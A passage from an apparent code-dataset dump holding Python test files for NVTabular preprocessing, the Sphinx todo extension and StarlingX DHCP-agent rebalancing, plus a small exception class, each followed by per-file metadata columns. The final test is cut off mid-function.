    # With replace=False the ops append suffixed columns, so stats are keyed
    # by "<col>_FillMissing_LogOp"; with replace=True the original key stays.
    concat_ops = "_FillMissing_LogOp"
    if replace:
        concat_ops = ""
    assert math.isclose(
        get_norms(df.x).mean(), processor.stats["means"]["x" + concat_ops], rel_tol=1e-1,
    )
    assert math.isclose(
        get_norms(df.y).mean(), processor.stats["means"]["y" + concat_ops], rel_tol=1e-1,
    )
    assert math.isclose(
        get_norms(df.x).std(), processor.stats["stds"]["x" + concat_ops], rel_tol=1e-1,
    )
    assert math.isclose(
        get_norms(df.y).std(), processor.stats["stds"]["y" + concat_ops], rel_tol=1e-1,
    )
    # Check that categories match
    if engine == "parquet":
        cats_expected0 = df["name-cat"].unique().values_to_string()
        cats0 = processor.stats["encoders"]["name-cat"].get_cats().values_to_string()
        # adding the None entry as a string because of move from gpu
        assert cats0 == ["None"] + cats_expected0
    cats_expected1 = df["name-string"].unique().values_to_string()
    cats1 = processor.stats["encoders"]["name-string"].get_cats().values_to_string()
    # adding the None entry as a string because of move from gpu
    assert cats1 == ["None"] + cats_expected1
    # Write to new "shuffled" and "processed" dataset
    processor.write_to_dataset(tmpdir, data_itr, nfiles=10, shuffle=True, apply_ops=True)
    data_itr_2 = nvtabular.io.GPUDatasetIterator(
        glob.glob(str(tmpdir) + "/ds_part.*.parquet"),
        use_row_groups=True,
        gpu_memory_frac=gpu_memory_frac,
    )
    df_pp = None
    for chunk in data_itr_2:
        df_pp = cudf.concat([df_pp, chunk], axis=0) if df_pp else chunk
    # Categorify must have turned string categories into int64 codes.
    if engine == "parquet":
        assert df_pp["name-cat"].dtype == "int64"
    assert df_pp["name-string"].dtype == "int64"
    # The written _metadata footer must agree with the data actually read.
    num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(str(tmpdir) + "/_metadata")
    assert num_rows == len(df_pp)
    return processor.ds_exports
| 38.444169
| 99
| 0.661718
| 2,197
| 15,493
| 4.461538
| 0.111971
| 0.016425
| 0.029178
| 0.028566
| 0.860845
| 0.85503
| 0.843705
| 0.831055
| 0.827484
| 0.827484
| 0
| 0.017415
| 0.192022
| 15,493
| 402
| 100
| 38.539801
| 0.765618
| 0.104241
| 0
| 0.754153
| 0
| 0
| 0.079318
| 0
| 0
| 0
| 0
| 0
| 0.106312
| 1
| 0.033223
| false
| 0
| 0.033223
| 0
| 0.086379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77d657adc73f4c65d2612ed1b1c32f0531117b2b
| 2,781
|
py
|
Python
|
tests/test_ext_todo.py
|
hio/sphinx
|
cb0220de1a0d8acd00292b898d2ef03b588179b0
|
[
"BSD-2-Clause"
] | 1
|
2021-11-06T17:09:04.000Z
|
2021-11-06T17:09:04.000Z
|
tests/test_ext_todo.py
|
hio/sphinx
|
cb0220de1a0d8acd00292b898d2ef03b588179b0
|
[
"BSD-2-Clause"
] | 1
|
2017-07-15T22:46:50.000Z
|
2017-07-15T22:46:50.000Z
|
tests/test_ext_todo.py
|
hio/sphinx
|
cb0220de1a0d8acd00292b898d2ef03b588179b0
|
[
"BSD-2-Clause"
] | 1
|
2021-11-06T17:08:54.000Z
|
2021-11-06T17:08:54.000Z
|
# -*- coding: utf-8 -*-
"""
test_ext_todo
~~~~~~~~~~~~~
Test sphinx.ext.todo extension.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import pytest
@pytest.mark.sphinx('html', testroot='ext-todo', freshenv=True,
                    confoverrides={'todo_include_todos': True, 'todo_emit_warnings': True})
def test_todo(app, status, warning):
    """With todo_include_todos=True the admonitions are rendered in the
    HTML, warnings are emitted, and the todo-defined event fires per entry.
    """
    todos = []

    def on_todo_defined(app, node):
        todos.append(node)

    app.connect('todo-defined', on_todo_defined)
    app.builder.build_all()

    # The todolist directive in index.html collects both entries.
    index_html = (app.outdir / 'index.html').text()
    for entry in ('todo in foo', 'todo in bar'):
        pattern = ('<p class="first admonition-title">Todo</p>\n'
                   '<p class="last">%s</p>' % entry)
        assert re.search(pattern, index_html, re.S)

    # The todo admonition itself appears in the defining document.
    foo_html = (app.outdir / 'foo.html').text()
    pattern = ('<p class="first admonition-title">Todo</p>\n'
               '<p class="last">todo in foo</p>')
    assert re.search(pattern, foo_html, re.S)

    # todo_emit_warnings=True emits one warning per entry.
    for entry in ('todo in foo', 'todo in bar'):
        assert 'WARNING: TODO entry found: %s' % entry in warning.getvalue()

    # The todo-defined event fired once per entry.
    assert len(todos) == 2
    assert set(todo[1].astext() for todo in todos) == set(['todo in foo', 'todo in bar'])
@pytest.mark.sphinx('html', testroot='ext-todo', freshenv=True,
                    confoverrides={'todo_include_todos': False, 'todo_emit_warnings': True})
def test_todo_not_included(app, status, warning):
    """With todo_include_todos=False the admonitions are omitted from the
    HTML, but warnings and the todo-defined event still fire per entry.
    """
    todos = []

    def on_todo_defined(app, node):
        todos.append(node)

    app.connect('todo-defined', on_todo_defined)
    app.builder.build_all()

    # Neither entry is rendered into the todolist in index.html.
    index_html = (app.outdir / 'index.html').text()
    for entry in ('todo in foo', 'todo in bar'):
        pattern = ('<p class="first admonition-title">Todo</p>\n'
                   '<p class="last">%s</p>' % entry)
        assert not re.search(pattern, index_html, re.S)

    # The admonition is also absent from the defining document.
    foo_html = (app.outdir / 'foo.html').text()
    pattern = ('<p class="first admonition-title">Todo</p>\n'
               '<p class="last">todo in foo</p>')
    assert not re.search(pattern, foo_html, re.S)

    # Warnings are independent of todo_include_todos.
    for entry in ('todo in foo', 'todo in bar'):
        assert 'WARNING: TODO entry found: %s' % entry in warning.getvalue()

    # The todo-defined event fired once per entry.
    assert len(todos) == 2
    assert set(todo[1].astext() for todo in todos) == set(['todo in foo', 'todo in bar'])
| 31.965517
| 92
| 0.619561
| 392
| 2,781
| 4.334184
| 0.19898
| 0.056504
| 0.042378
| 0.052972
| 0.901118
| 0.901118
| 0.901118
| 0.864626
| 0.864626
| 0.864626
| 0
| 0.005977
| 0.217907
| 2,781
| 86
| 93
| 32.337209
| 0.775172
| 0.117584
| 0
| 0.875
| 0
| 0
| 0.331679
| 0.069479
| 0
| 0
| 0
| 0.034884
| 0.291667
| 1
| 0.083333
| false
| 0
| 0.041667
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb0c78b0fa58e2b62baa40084631715cc2e02f86
| 114
|
py
|
Python
|
services/transactionservice/exception.py
|
autokrator-uog/backend
|
0a2d46f9b52465ed8dfc9234858d6a93f3754c05
|
[
"MIT"
] | null | null | null |
services/transactionservice/exception.py
|
autokrator-uog/backend
|
0a2d46f9b52465ed8dfc9234858d6a93f3754c05
|
[
"MIT"
] | null | null | null |
services/transactionservice/exception.py
|
autokrator-uog/backend
|
0a2d46f9b52465ed8dfc9234858d6a93f3754c05
|
[
"MIT"
] | 1
|
2019-06-09T23:51:13.000Z
|
2019-06-09T23:51:13.000Z
|
from services.exceptions import ServiceException
class TransactionServiceException(ServiceException):
    """Exception raised by the transaction service.

    Exists purely as a marker subclass of the shared ServiceException so
    callers can catch transaction-service failures specifically; it adds
    no behavior of its own.
    """

    pass
| 16.285714
| 52
| 0.842105
| 9
| 114
| 10.666667
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122807
| 114
| 6
| 53
| 19
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
bb3548db62d0b18824e6b9d4bdda8afec6db619a
| 24,166
|
py
|
Python
|
nfv/nfv-tests/nfv_unit_tests/tests/test_dhcp_network_rebalance_randomized.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-tests/nfv_unit_tests/tests/test_dhcp_network_rebalance_randomized.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-tests/nfv_unit_tests/tests/test_dhcp_network_rebalance_randomized.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import mock
import random
from nfv_vim.network_rebalance._dhcp_rebalance import _add_network_to_dhcp_agent_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _DHCPRebalance
from nfv_vim.network_rebalance._dhcp_rebalance import _get_datanetworks_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _get_dhcp_agent_networks_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _get_network_agents_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _remove_network_from_dhcp_agent_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _run_state_machine
from nfv_vim.network_rebalance._dhcp_rebalance import add_rebalance_work_dhcp
from nfv_vim.network_rebalance._dhcp_rebalance import DHCP_REBALANCE_STATE
from . import testcase # noqa: H304
from . import utils # noqa: H304
# Flip to True (or uncomment the line below) for verbose test tracing.
DEBUG_PRINTING = False
# DEBUG_PRINTING = True

# host name -> _fake_host; stands in for the vim host table in the mocks.
_fake_host_table = dict()
class _fake_host(object):
def __init__(self, uuid):
self.uuid = uuid
# Upper bounds for the randomized agent and network counts, and a cap on
# state-machine iterations so a machine that never reaches DONE fails fast.
MAX_AGENTS = 40
MAX_NETWORKS = 200
MAX_LOOPCOUNT = 2 * MAX_AGENTS * MAX_NETWORKS
def build_get_agents_response():
    """Fabricate a neutron get-agents reply with a random agent count.

    Each agent is named compute-N; roughly one in six is marked
    administratively down. Every agent is also registered in the fake
    host table as a side effect.
    """
    num_agents = random.randint(2, MAX_AGENTS - 1)
    result_data = []
    for idx in range(num_agents):
        host_name = "compute-" + str(idx)
        # randomly set admin_state_up on some agents to False (~1 in 6)
        admin_state_up = random.randint(0, 5) != 0
        result_data.append({"host": host_name, "agent_type": "DHCP agent",
                            "id": host_name + "_id", "alive": True,
                            "admin_state_up": admin_state_up})
        add_to_fake_host_table(host_name)
    return {'completed': True, 'reason': '', 'result-data': result_data}
def build_get_dhcp_agent_networks_response(agent_id,
                                           use_strange_networks=False):
    """Fabricate a get-networks-on-dhcp-agent reply with a random count.

    By default every network sits on physnet0. With use_strange_networks,
    roughly three in four land on physnet3 instead, which no fake host
    reports in its datanetworks.
    """
    networks = []
    for idx in range(random.randint(0, MAX_NETWORKS - 1)):
        physnet = "physnet0"
        if use_strange_networks:
            if random.randint(0, 3) > 0:
                physnet = "physnet3"
        networks.append({"id": agent_id + "_network_" + str(idx),
                         "provider:physical_network": physnet})
    return {'completed': True, 'reason': '', 'result-data': networks}
def build_get_datanetworks_response(host_id):
    """Fabricate a get-datanetworks reply: every host reports physnet0/1.

    host_id is accepted for signature compatibility with the real call
    but does not influence the reply.
    """
    return {
        'completed': True,
        'reason': '',
        'result-data': [{u'datanetwork_name': u'physnet0'},
                        {u'datanetwork_name': u'physnet1'}],
    }
# Shared test logger, patched over the module DLOG below; it only prints
# when DEBUG_PRINTING is enabled.
dlog_local = utils.dlog(DEBUG_PRINTING)
def fake_nfvi_get_network_agents(a):
    """Mock for nfvi_get_network_agents: hands a fabricated agent list
    straight to the rebalance callback instead of calling neutron."""
    agents_response = build_get_agents_response()
    if DEBUG_PRINTING:
        print("fake_nfvi_get_network_agents")
        print("response = %s" % agents_response)
    _get_network_agents_callback_body(agents_response)
def fake_nfvi_get_dhcp_agent_networks_strange_nets(agent_id, b):
    """Mock for nfvi_get_dhcp_agent_networks that fabricates networks on
    physnets the fake hosts do not host ("strange" networks)."""
    networks_response = build_get_dhcp_agent_networks_response(agent_id, True)
    if DEBUG_PRINTING:
        print("fake_nfvi_get_dhcp_agent_networks_strange_nets")
        print("agent_id = %s" % agent_id)
        print("response = %s" % networks_response)
    _get_dhcp_agent_networks_callback_body(agent_id, networks_response)
def fake_nfvi_get_dhcp_agent_networks(agent_id, b):
    """Mock for nfvi_get_dhcp_agent_networks: fabricates a network list
    (all on physnet0) and feeds it to the rebalance callback."""
    networks_response = build_get_dhcp_agent_networks_response(agent_id)
    if DEBUG_PRINTING:
        print("fake_nfvi_get_dhcp_agent_networks")
        print("agent_id = %s" % agent_id)
        print("response = %s" % networks_response)
    _get_dhcp_agent_networks_callback_body(agent_id, networks_response)
def fake_nfvi_get_datanetworks(host_id, b):
    """Mock for nfvi_get_datanetworks: every host reports physnet0/1."""
    datanetworks_response = build_get_datanetworks_response(host_id)
    if DEBUG_PRINTING:
        print("fake_nfvi_get_datanetworks")
        print("response = %s" % datanetworks_response)
    _get_datanetworks_callback_body(host_id, datanetworks_response)
def fake_nfvi_remove_network_from_dhcp_agent(a, b, c):
    """Mock for nfvi_remove_network_from_dhcp_agent: always succeeds."""
    success_response = {'completed': True, 'reason': ''}
    if DEBUG_PRINTING:
        print("fake_nfvi_remove_network_from_dhcp_agent")
        print("response = %s" % success_response)
    _remove_network_from_dhcp_agent_callback_body(a, b, success_response)
def fake_nfvi_add_network_to_dhcp_agent(a, b, c):
    """Mock for nfvi_add_network_to_dhcp_agent: always succeeds."""
    success_response = {'completed': True, 'reason': ''}
    if DEBUG_PRINTING:
        print("fake_nfvi_add_network_to_dhcp_agent")
        print("response = %s" % success_response)
    _add_network_to_dhcp_agent_callback_body(success_response)
def fake_tables_get_host_table():
    """Mock for tables_get_host_table: returns the module-level fake
    table populated by add_to_fake_host_table()."""
    return _fake_host_table
def add_to_fake_host_table(host_name):
    """Register host_name in the fake host table with a derived uuid."""
    host_uuid = host_name + "_uuid"
    _fake_host_table[host_name] = _fake_host(host_uuid)
@mock.patch('nfv_vim.network_rebalance._dhcp_rebalance.DLOG',
            dlog_local)
@mock.patch('nfv_vim.nfvi.nfvi_remove_network_from_dhcp_agent',
            fake_nfvi_remove_network_from_dhcp_agent)
@mock.patch('nfv_vim.nfvi.nfvi_get_network_agents',
            fake_nfvi_get_network_agents)
@mock.patch('nfv_vim.nfvi.nfvi_get_datanetworks',
            fake_nfvi_get_datanetworks)
# NOTE(review): nfvi_remove_network_from_dhcp_agent is patched twice (also
# above) — redundant but harmless; confirm before cleaning up.
@mock.patch('nfv_vim.nfvi.nfvi_remove_network_from_dhcp_agent',
            fake_nfvi_remove_network_from_dhcp_agent)
@mock.patch('nfv_vim.nfvi.nfvi_add_network_to_dhcp_agent',
            fake_nfvi_add_network_to_dhcp_agent)
@mock.patch('nfv_vim.tables.tables_get_host_table',
            fake_tables_get_host_table)
class TestNeutronDHCPRebalance(testcase.NFVTestCase):
    """Randomized tests of the DHCP-agent rebalance state machine.

    All nfvi calls are patched with the fake_* helpers above, so each
    _run_state_machine() step consumes fabricated agent/network data.
    Each test drives the machine to DONE repeatedly with random agent
    counts, network counts, and network_diff_threshold values, and checks
    that networks are conserved and (where applicable) balanced.
    """

    def setUp(self):
        super(TestNeutronDHCPRebalance, self).setUp()

    def tearDown(self):
        super(TestNeutronDHCPRebalance, self).tearDown()

    @mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
                fake_nfvi_get_dhcp_agent_networks)
    def test_rebalance_down_host_randomized_w_api_calls(self):
        """Host-down rebalance: the down agent ends with zero networks and
        the total network count is conserved."""
        initial_network_count = 0
        initial_network_config = list()
        for x in range(1, 200):
            _DHCPRebalance.network_diff_threshold = random.randint(1, 4)
            # Queue compute-0 as a down host and run the machine to DONE.
            add_rebalance_work_dhcp('compute-0', True)
            loopcount = 0
            if DEBUG_PRINTING:
                print("HOST DOWN TEST NUMBER %s" % str(x))
            while True:
                loopcount += 1
                old_state = _DHCPRebalance.get_state()
                _run_state_machine()
                new_state = _DHCPRebalance.get_state()
                # Snapshot the per-agent network counts right after they
                # have been gathered, before any rescheduling happens.
                if ((old_state ==
                        DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
                        (new_state ==
                         DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS)):
                    for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
                        initial_network_config.append(
                            _DHCPRebalance.num_networks_on_agents[idx])
                    initial_network_count = \
                        sum(_DHCPRebalance.num_networks_on_agents)
                if (_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and \
                        (len(_DHCPRebalance.host_down_queue) == 0):
                    final_network_count = \
                        sum(_DHCPRebalance.num_networks_on_agents)
                    if DEBUG_PRINTING:
                        print("network_diff_threshold: %s" %
                              _DHCPRebalance.network_diff_threshold)
                        print("initial_network_count: %s, "
                              "final_network_count: %s" %
                              (initial_network_count, final_network_count))
                        print("initial num_networks_on_agents: %s, "
                              "final num_networks_on_agents: %s" %
                              (initial_network_config,
                               _DHCPRebalance.num_networks_on_agents))
                    del initial_network_config[:]
                    if len(_DHCPRebalance.num_networks_on_agents) > 2:
                        num_networks_length = \
                            len(_DHCPRebalance.num_networks_on_agents)
                        # The down agent (index 0) must have been drained,
                        # and no networks may be lost or invented.
                        assert ((num_networks_length == 0) or
                                _DHCPRebalance.num_networks_on_agents[0] == 0)
                        assert (initial_network_count == final_network_count)
                    else:
                        if DEBUG_PRINTING:
                            print("less than 2 agents, nothing to do")
                    break
                if loopcount >= MAX_LOOPCOUNT:
                    print("Loopcount exit!!! loopcount:%s" % loopcount)
                assert loopcount < MAX_LOOPCOUNT

    @mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
                fake_nfvi_get_dhcp_agent_networks)
    def test_rebalance_down_host_abort_w_api_calls(self):
        """Host-down rebalance interrupted by a second host-down event in a
        randomly chosen state: the machine must restart cleanly and still
        conserve and drain networks."""
        initial_network_count = 0
        initial_network_config = list()
        abort_state_list = [DHCP_REBALANCE_STATE.GET_DHCP_AGENTS,
                            DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT,
                            DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS,
                            DHCP_REBALANCE_STATE.RESCHEDULE_DOWN_AGENT,
                            DHCP_REBALANCE_STATE.HOLD_OFF,
                            DHCP_REBALANCE_STATE.DONE]
        for x in range(1, 200):
            _DHCPRebalance.network_diff_threshold = random.randint(1, 4)
            add_rebalance_work_dhcp('compute-0', True)
            loopcount = 0
            if DEBUG_PRINTING:
                print("HOST DOWN TEST NUMBER %s" % str(x))
            aborted = False
            doing_abort = False
            # Pick the state in which the interrupting event is injected.
            abort_state = random.randint(0, len(abort_state_list) - 1)
            while True:
                loopcount += 1
                old_state = _DHCPRebalance.get_state()
                if old_state == (abort_state_list[abort_state]) and (not aborted):
                    aborted = True
                    doing_abort = True
                    add_rebalance_work_dhcp('compute-1', True)
                    if DEBUG_PRINTING:
                        print("host-down adding compute-1 down in state: %s." %
                              old_state)
                _run_state_machine()
                new_state = _DHCPRebalance.get_state()
                if doing_abort:
                    doing_abort = False
                    # After an interrupting host-down, the machine must
                    # restart at GET_NETWORKS_HOSTED_ON_AGENT (or finish
                    # outright if there are too few agents to rebalance).
                    if (old_state != DHCP_REBALANCE_STATE.DONE) and \
                            (old_state != DHCP_REBALANCE_STATE.HOLD_OFF):
                        if _DHCPRebalance.num_dhcp_agents < 2:
                            assert(new_state == DHCP_REBALANCE_STATE.DONE)
                        else:
                            assert(new_state ==
                                   DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT)
                if ((old_state ==
                        DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
                        (new_state ==
                         DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS)):
                    for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
                        initial_network_config.append(
                            _DHCPRebalance.num_networks_on_agents[idx])
                    initial_network_count = \
                        sum(_DHCPRebalance.num_networks_on_agents)
                if (_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and \
                        (len(_DHCPRebalance.host_down_queue) == 0):
                    final_network_count = \
                        sum(_DHCPRebalance.num_networks_on_agents)
                    if DEBUG_PRINTING:
                        print("network_diff_threshold: %s" %
                              _DHCPRebalance.network_diff_threshold)
                        print("initial_network_count: %s, "
                              "final_network_count: %s" %
                              (initial_network_count, final_network_count))
                        print("initial num_networks_on_agents: %s, "
                              "final num_networks_on_agents: %s" %
                              (initial_network_config,
                               _DHCPRebalance.num_networks_on_agents))
                    del initial_network_config[:]
                    if len(_DHCPRebalance.num_networks_on_agents) > 2:
                        num_networks_length = \
                            len(_DHCPRebalance.num_networks_on_agents)
                        assert ((num_networks_length == 0) or
                                _DHCPRebalance.num_networks_on_agents[0] == 0)
                        assert (initial_network_count == final_network_count)
                    else:
                        if DEBUG_PRINTING:
                            print("less than 2 agents, nothing to do")
                    break
                if loopcount >= MAX_LOOPCOUNT:
                    print("Loopcount exit!!! loopcount:%s" % loopcount)
                assert loopcount < MAX_LOOPCOUNT

    @mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
                fake_nfvi_get_dhcp_agent_networks)
    def test_rebalance_up_host_abort_randomized_w_api_calls(self):
        """Host-up rebalance interrupted by a host-down event in a randomly
        chosen state: the machine must move to HOLD_OFF, then finish with
        conserved and balanced networks."""
        initial_network_count = 0
        initial_network_config = list()
        abort_state_list = [DHCP_REBALANCE_STATE.GET_DHCP_AGENTS,
                            DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT,
                            DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS,
                            DHCP_REBALANCE_STATE.RESCHEDULE_NEW_AGENT,
                            DHCP_REBALANCE_STATE.HOLD_OFF,
                            DHCP_REBALANCE_STATE.DONE]
        for x in range(1, 200):
            _DHCPRebalance.network_diff_threshold = random.randint(1, 4)
            # Queue compute-0 as an up host this time.
            add_rebalance_work_dhcp('compute-0', False)
            aborted = False
            doing_abort = False
            abort_state = random.randint(0, len(abort_state_list) - 1)
            loopcount = 0
            if DEBUG_PRINTING:
                print("HOST UP TEST NUMBER %s" % str(x))
            while True:
                loopcount += 1
                old_state = _DHCPRebalance.get_state()
                if old_state == (abort_state_list[abort_state]) and (not aborted):
                    aborted = True
                    doing_abort = True
                    add_rebalance_work_dhcp('compute-1', True)
                    if DEBUG_PRINTING:
                        print("host-up adding compute-1 down in state: %s." %
                              old_state)
                _run_state_machine()
                new_state = _DHCPRebalance.get_state()
                if doing_abort:
                    doing_abort = False
                    # A host-down arriving mid host-up rebalance must push
                    # the machine into HOLD_OFF.
                    if (old_state != DHCP_REBALANCE_STATE.DONE) and \
                            (old_state != DHCP_REBALANCE_STATE.HOLD_OFF):
                        assert(new_state ==
                               DHCP_REBALANCE_STATE.HOLD_OFF)
                if ((old_state ==
                        DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
                        ((new_state ==
                          DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS) or
                         (new_state == DHCP_REBALANCE_STATE.DONE))):
                    # new_state DONE is for already balanced case
                    for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
                        initial_network_config.append(
                            _DHCPRebalance.num_networks_on_agents[idx])
                    initial_network_count = sum(
                        _DHCPRebalance.num_networks_on_agents)
                if ((_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and
                        (len(_DHCPRebalance.host_up_queue) == 0) and
                        (len(_DHCPRebalance.host_down_queue) == 0)):
                    final_network_count = sum(
                        _DHCPRebalance.num_networks_on_agents)
                    if DEBUG_PRINTING:
                        print("network_diff_threshold: %s" %
                              _DHCPRebalance.network_diff_threshold)
                        print("initial_network_count: %s, "
                              "final_network_count: %s" %
                              (initial_network_count, final_network_count))
                        print("initial num_networks_on_agents: %s, "
                              "final num_networks_on_agents: %s" %
                              (initial_network_config,
                               _DHCPRebalance.num_networks_on_agents))
                    del initial_network_config[:]
                    if len(_DHCPRebalance.num_networks_on_agents) > 2:
                        # Networks are conserved and spread within the
                        # configured imbalance threshold.
                        assert (initial_network_count == final_network_count)
                        assert (max(_DHCPRebalance.num_networks_on_agents) -
                                min(_DHCPRebalance.num_networks_on_agents) <=
                                _DHCPRebalance.network_diff_threshold)
                    else:
                        if DEBUG_PRINTING:
                            print("less than 2 agents, nothing to do")
                    break
                if loopcount >= MAX_LOOPCOUNT:
                    print("Loopcount exit!!! loopcount:%s" % loopcount)
                assert loopcount < MAX_LOOPCOUNT

    @mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
                fake_nfvi_get_dhcp_agent_networks)
    def test_rebalance_up_host_randomized_w_api_calls(self):
        """Host-up rebalance: networks end up conserved and spread within
        network_diff_threshold across agents."""
        initial_network_count = 0
        initial_network_config = list()
        for x in range(1, 200):
            _DHCPRebalance.network_diff_threshold = random.randint(1, 4)
            add_rebalance_work_dhcp('compute-0', False)
            loopcount = 0
            if DEBUG_PRINTING:
                print("HOST UP TEST NUMBER %s" % str(x))
            while True:
                loopcount += 1
                old_state = _DHCPRebalance.get_state()
                _run_state_machine()
                new_state = _DHCPRebalance.get_state()
                if ((old_state ==
                        DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
                        ((new_state ==
                          DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS) or
                         (new_state == DHCP_REBALANCE_STATE.DONE))):
                    # new_state DONE is for already balanced case
                    for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
                        initial_network_config.append(
                            _DHCPRebalance.num_networks_on_agents[idx])
                    initial_network_count = sum(
                        _DHCPRebalance.num_networks_on_agents)
                if ((_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and
                        (len(_DHCPRebalance.host_up_queue) == 0)):
                    final_network_count = sum(
                        _DHCPRebalance.num_networks_on_agents)
                    if DEBUG_PRINTING:
                        print("network_diff_threshold: %s" %
                              _DHCPRebalance.network_diff_threshold)
                        print("initial_network_count: %s, "
                              "final_network_count: %s" %
                              (initial_network_count, final_network_count))
                        print("initial num_networks_on_agents: %s, "
                              "final num_networks_on_agents: %s" %
                              (initial_network_config,
                               _DHCPRebalance.num_networks_on_agents))
                    del initial_network_config[:]
                    if len(_DHCPRebalance.num_networks_on_agents) > 2:
                        assert (initial_network_count == final_network_count)
                        assert (max(_DHCPRebalance.num_networks_on_agents) -
                                min(_DHCPRebalance.num_networks_on_agents) <=
                                _DHCPRebalance.network_diff_threshold)
                    else:
                        if DEBUG_PRINTING:
                            print("less than 2 agents, nothing to do")
                    break
                if loopcount >= MAX_LOOPCOUNT:
                    print("Loopcount exit!!! loopcount:%s" % loopcount)
                assert loopcount < MAX_LOOPCOUNT

    @mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
                fake_nfvi_get_dhcp_agent_networks_strange_nets)
    def test_rebalance_up_strange_networks(self):
        """Host-up rebalance where some networks sit on a physnet no agent
        hosts: only conservation is asserted, since such networks cannot
        always be balanced."""
        initial_network_count = 0
        initial_network_config = list()
        for x in range(1, 200):
            _DHCPRebalance.network_diff_threshold = random.randint(1, 4)
            add_rebalance_work_dhcp('compute-0', False)
            loopcount = 0
            if DEBUG_PRINTING:
                print("HOST UP TEST NUMBER %s" % str(x))
            while True:
                loopcount += 1
                old_state = _DHCPRebalance.get_state()
                _run_state_machine()
                new_state = _DHCPRebalance.get_state()
                if ((old_state ==
                        DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
                        ((new_state ==
                          DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS) or
                         (new_state == DHCP_REBALANCE_STATE.DONE))):
                    # new_state DONE is for already balanced case
                    for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
                        initial_network_config.append(
                            _DHCPRebalance.num_networks_on_agents[idx])
                    initial_network_count = sum(
                        _DHCPRebalance.num_networks_on_agents)
                if ((_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and
                        (len(_DHCPRebalance.host_up_queue) == 0)):
                    final_network_count = sum(
                        _DHCPRebalance.num_networks_on_agents)
                    if DEBUG_PRINTING:
                        print("network_diff_threshold: %s" %
                              _DHCPRebalance.network_diff_threshold)
                        print("initial_network_count: %s, "
                              "final_network_count: %s" %
                              (initial_network_count, final_network_count))
                        print("initial num_networks_on_agents: %s, "
                              "final num_networks_on_agents: %s" %
                              (initial_network_config,
                               _DHCPRebalance.num_networks_on_agents))
                    del initial_network_config[:]
                    if len(_DHCPRebalance.num_networks_on_agents) > 2:
